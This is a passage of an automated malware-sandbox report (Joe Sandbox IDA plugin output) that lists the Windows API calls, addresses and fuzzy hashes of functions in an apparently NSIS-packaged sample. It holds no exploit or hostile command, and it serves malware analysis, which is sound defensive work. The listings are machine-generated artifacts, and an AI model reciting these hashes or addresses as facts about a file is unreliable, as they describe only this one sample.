                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00402894
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                  • Part of subcall function 00403258: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004028B0
                                                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                  • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403091
                                                                                                                  • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403138
                                                                                                                  • Part of subcall function 00403027: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 00403161
                                                                                                                  • Part of subcall function 00403027: wsprintfW.USER32 ref: 00403174
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402928
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 2082585436-0
                                                                                                                • Opcode ID: f09a1f9abd4752cb5b2d55da90d863fde1dab2faf049735581e37d10801ea25f
                                                                                                                • Instruction ID: f11faf613eabf70f6da5efab5544ef3b1f343b4f82166007b8c29dabf9a1b1c4
                                                                                                                • Opcode Fuzzy Hash: f09a1f9abd4752cb5b2d55da90d863fde1dab2faf049735581e37d10801ea25f
                                                                                                                • Instruction Fuzzy Hash: D0217C72800118BFCF116FA5CE4889E7EB9EF09324F24423AF554762E0C6795D81DB68
                                                                                                                APIs
                                                                                                                • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75573420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                • CharNextW.USER32(0040A300,0043F000,75573420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                • CharPrevW.USER32(0040A300,0040A300,75573420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Prev
                                                                                                                • String ID: *?|<>/":
                                                                                                                • API String ID: 589700163-165019052
                                                                                                                • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                APIs
                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,755723A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 1941528284-0
                                                                                                                • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1912718029-0
                                                                                                                • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1849352358-0
                                                                                                                • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                APIs
                                                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 3808545654-0
                                                                                                                • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                • wsprintfW.USER32 ref: 00404A1A
                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                • String ID: %u.%u%s%s
                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                • String ID: !
                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                • wsprintfW.USER32 ref: 00406411
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                • String ID: %s%S.dll
                                                                                                                • API String ID: 2200240437-2744773210
                                                                                                                • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                APIs
                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1356686001-0
                                                                                                                • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,755723A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                  • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                  • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401EAA
                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 3585118688-0
                                                                                                                • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                                • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                                • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                • String ID:
                                                                                                                • API String ID: 3449924974-0
                                                                                                                • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                • String ID:
                                                                                                                • API String ID: 2102729457-0
                                                                                                                • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70, 4Wu,?,00441800,00405866,?,75573420,00441800,0043F000), ref: 00405AC2
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,00441800,00405866,?,75573420,00441800,0043F000), ref: 00405B6A
                                                                                                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,00441800,00405866,?,75573420,00441800), ref: 00405B7A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                • String ID: 4Wu
                                                                                                                • API String ID: 3248276644-2004972366
                                                                                                                • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                                • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                  • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
